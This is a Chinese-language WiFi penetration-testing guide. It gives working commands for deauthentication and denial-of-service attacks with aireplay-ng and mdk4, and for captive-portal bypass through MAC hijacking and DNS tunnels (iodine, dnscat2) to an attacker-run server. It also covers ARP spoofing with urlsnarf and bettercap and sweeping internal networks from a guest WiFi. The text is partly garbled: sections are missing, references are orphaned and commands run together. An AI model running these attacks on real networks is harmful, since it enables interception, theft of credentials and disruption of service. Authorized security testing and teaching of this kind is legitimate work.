近源渗透评估指南-WiFi篇

在安全评估过程，经常会遇到对无线(Wireless)网络进行渗透测试的需求。最近刚好在写一个针对WiFi的测试指南，写完后分享出来，有需要的可以作为参考，当然可能不一定全，这里只是抛砖引玉，有疏漏或者不当之处，欢迎大家提出意见和反馈。

针对WiFi的测试项大致如下：

常用的工具包括：

• 一些 wireless 驱动忽略直接的deauthentication，仅对广播的deauthentication 进行响应。我们可以将上面的aireplay-ng命令去掉-c参数运行 (如：sudo aireplay-ng –deauth 10 -a A4:A9:30:57:46:8D wlan0mon )。

• 目标使用了802.11我，会忽略未加密的deauthentication数据包，此时唯一的办法就是等待客户端连接。

• 设备自己没有重新连接，或者超出了信号的范围

在破解完密码后，可以使用airdecap-ng尝试解密流量，验证密码的正确性：

• hxxps[:]//posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
  

• hxxps[:]//medium.com/purple-team/conduct-red-team-engagements-on-wifi-with-wifiphisher-13fc55db29b1

• hxxps[:]//www.amazon.com/dp/1801819777 (第6章 Wireless and Bluetooth Attacks )

• hxxps[:]//www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/snappy-detecting-rogue-and-fake-80211-wireless-access-points-through-fingerprinting-beacon-management-frames/

WPA Enterprise加密方式为MGT，如下图。在实际测试过程，如果目标环境使用密码认证，我们同样可以尝试使用Rogue Access Points获取合法用户的凭据，然后对hash进行破解。但如果使用的是证书认证，则可能无法破解密码：

关于的攻击，可以参考：

• hxxps[:]//pentest.blog/attacking-wpa-enterprise-wireless-network/
  

• hxxps[:]//www.offsec.com/penetration-testing/hacking-wpa-enterprise-with-kali-linux/

Captive Portals (强制门户)通常设置在未加密或者开放的网络，使访客或者员工有时即使在没有凭据的情况下，也能很容易地连接到网络或者互联网。

使用Captive Portal相对简单。用户在没有输入任何凭据的情况下连接到目标网络。连接后，OS或者浏览器将会检测到captive portal的存在，并自动打开浏览器提示登录。欢迎页面通常包含规则和条件的说明，以及登录/密码提示。最常见的就是通过手机号和短信验证码进行认证，或者通过手机接收一个临时的账户密码进行登录。

大多数现代操作系统和浏览器 (手机和电脑上的浏览器) 会自动测试互联网的连接。检测captive portal也是这个测试的一部分。但是互联网连接和captive portal之间有些区别。

一般来说，OS或者浏览器将会尝试解析一个或者一组URL，然后看是否收到响应。例如，该响应可以以HTTP 204响应的形式出现，或者甚至只是响应“success”。如果DNS解析成功，但是访问特定URL失败，它将提示一个包含登录界面的强制门户 (captive portal)。

因为使用captive portal网络一般都会允许DNS协议的流量，我们可以通过一些技术手段，尝试绕过认证，直接访问互联网。

下面对几种方法详细介绍。

MAC地址欺骗的原理比较简单，我们可以通过ARP扫描已经连接到相同WiFi的主机，如果这些主机里面有已经登录过captive portal的，我们可以将自己的MAC地址修改为对应主机的MAC地址，然后测试是否能够访问互联网。

sudo apt -y install sipcalc nmapwget https://raw.githubusercontent.com/systematicat/hack-captive-portals/master/hack-captive.shsudo chmod u+x hack-captive.sh

$ sudo ./hack-captive.sh
Looking for active hosts in 192.168.140.0/24. Please wait.Trying to hijack 192.168.140.10 - 08:45:d1:17:82:2bSuitable hosts not found. Checking another network chunk.Looking for active hosts in 192.168.141.0/24. Please wait.Trying to hijack 192.168.141.31 - a4:23:32:03:26:e5Trying to hijack 192.168.141.38 - a4:23:31:03:c3:39Trying to hijack 192.168.141.46 - b2:f2:22:5f:ff:1d......Trying to hijack 192.168.141.120 - a4:29:33:14:e9:49Trying to hijack 192.168.141.123 - ae:6e:5b:12:f4:c4Trying to hijack 192.168.141.251 - a4:29:23:04:52:68

sudo ifconfig wlan0  downsudo macchanger --mac  AB:5C:FC:77:AE:7D  wlan0
sudo ifconfig wlan0 up

sudo ifconfig wlan0 downsudo ifconfig wlan0 hw ether 38:33:15:xx:xx:xxsudo ifconfig wlan0 up
# 或者使用macchangersudo macchanger wlan0 -e # orsudo macchanger wlan0 -r

sudo airodump-ng --bssid EC:01:D5:A2:10:00 wlan0mon

因为OS或者浏览器检测captive portal时一般都会允许DNS访问的流量，所以我们可以尝试使用DNS隧道绕过captive portal。

dig @1.1.1.1 www.baidu.com +short

从上图可以看到允许。

要使用DNS隧道，我们需要有一个自己的域名以及公网VPS (dnscat2可以直接用IP连，但在captive portal场景下可能无法直接用IP)。

配置方法比较简单，我们首先创建一个A记录，这里为ns1，指向自己的VPS，然后创建一个NS记录，指向ns1，如下：

在DNS记录能正常解析后，我们就可以尝试创建DNS隧道。第一个工具是iodine，该工具会在Server端和客户端创建两个虚拟的网卡，然后创建一条虚拟链路。Kali默认安装，如果没有安装，可以用如下命令进行编译：

git clone https://github.com/yarrick/iodine.gitcd iodine/make

sudo ./iodined -f -c -P cxh@CNSOC 192.168.5.1/24 wifipte.example.com

ssh -N -D 0.0.0.0:1080 ubuntu@192.168.5.1 

最后，在测试主机配置socks代理就可以使用浏览器访问互联网了：

在Ubuntu 20.04 LTS可以使用如下命令编译dnscat2的Server端：

git clone https://github.com/iagox86/dnscat2.gitcd dnscat2/server/gem install bundlerbundle install

ruby ./dnscat2.rb -p 1.1.1.1 -secret=cxh@123456 wifipte.example.com

测试没有问题后，我们就可以使用dnscat2创建DNS隧道：

dnscat --dns domain=wifipte.example.com --secret=cxh@123456

出现”Session established!”，说明会话建立成功。

sudo netdiscover -i wlan0

sudo sysctl -w net.ipv4.ip_forward=1# 或者sudo suecho 1 > /proc/sys/net/ipv4/ip_forward

sudo arpspoof -i wlan0 -t 192.168.5.150 192.168.5.1sudo arpspoof -i wlan0 -t 192.168.5.1 192.168.5.150sudo urlsnarf 

此外，也可以使用bettercap执行arp欺骗：

set arp.spoof.fullduplex true           set arp.spoof.targets 192.168.5.150     arp.spoof on  

对于Captive Portal的攻击，除了上面介绍的Web应用漏洞测试，绕过Captive Portal，我们也可以使用Evil Twin来获取合法用户的凭据，具体可以参考：

在接入WiFi后，我们可以测试目标环境的网络隔离是否真的有效，比如我们可以模拟攻击者接入Guest网络后尝试访问内部系统以及数据。

route -nip route shownmap -sn 172.20.10.1

接下来，可以对整个内网IP段进行扫描，看通过Guest网络能访问哪些主机或者系统。我们可以用下面的脚本调用fping来扫描：

#!/bin/bash
echo Start at $(date +'%F %T')echo > gateway.txt
for i in $(seq 0 255); do    for j in $(seq 1 254); do        fping  -b 1 -r 1 -a 192.168.$i.$j >> gateway.txt    donedone
for i in $(seq 0 255); do    for j in $(seq 16 31); do        for q in $(seq 1 254);do            fping  -b 1 -r 1 -a 172.$j.$i.$q >> gateway.txt        done    donedone
for i in $(seq 0 255); do    for j in $(seq 0 255); do        for q in $(seq 1 254);do            fping  -b 1 -r 1 -a 10.$j.$i.$q >> gateway.txt       done    donedone
echo Finished at $(date +'%F %T')

如果渗透测试包括拒绝服务的测试，我们可以使用工具mdk4 (https://github.com/aircrack-ng/mdk4) 执行相关的测试。mdk4包含多种攻击模式，下面我们将介绍几种可以用来执行拒绝服务攻击的模式。

在执行攻击之前，我们需要获取目标AP相关信息。首先检查并结束影响将网卡设置为监听模式的进程，然后将无线网卡设置为监听模式：

sudo airmon-ng checksudo airmon-ng check killsudo airmon-ng start wlan0

然后使用airodump-ng获取目标AP信息，比如BSSID，信道，加密算法，ESSID，连接的客户端等：

sudo airodump-ng  wlan0mon

在获取了相关信息后，就可以对不同的攻击模式进行测试。

攻击模式a会给所有AP或者指定AP发送认证数据包，会在短时间内出现多个虚假的客户端连接AP，导致AP重置或者合法客户端无法连接。

sudo mdk4 wlan0mon a -i 98:0D:51:16:C0:C8 -s 100000

在攻击开始后，可以尝试用其他设备连接目标AP，看能否成功。这种攻击可能目前对部分路由器已经无效，但部分路由器还是可以使用这种方式攻击，大家实际测试过程可以继续尝试下。

向客户端发送解除认证和解除关联的数据包，以断开所有客户端与AP的连接。

下面对BSSID为A4:A9:30:57:46:8D的AP进行测试

sudo mdk4 wlan0mon d  -B A4:A9:30:57:46:8D -s 10000

如果攻击成功，则客户端会一直自动断开。

sudo aireplay-ng -0 0 -a A4:A9:30:57:46:8D   wlan0mon

在另一个QoS队列发送随机的数据包或者注入重复的数据包，以在使用TKIP加密的AP上引发Michael Countermeasures。

如果目标AP使用了TKIP加密，则可以尝试下这种攻击方法，下面以MAC地址为9C:28:EF:62:E7:4C的AP为例：

sudo mdk4 wlan0mon m -t 9C:28:EF:62:E7:4C  -s 1000 -w 1

然后我们可以查看其他设备是否能够正常连接目标AP并使用。

用EAPOL Start桢对AP泛洪，使其忙于处理虚假的会话，从而无法处理合法的客户端。或者通过注入假的EAPOL Logoff消息注销客户端。

下面以MAC地址为94:28:6F:BB:0F:99的AP为例：

sudo mdk4 wlan0mon e -t 94:28:6F:BB:0F:99 -s 1000

发送攻击数据包后，我们可以观察其他设备能否正常连接并使用。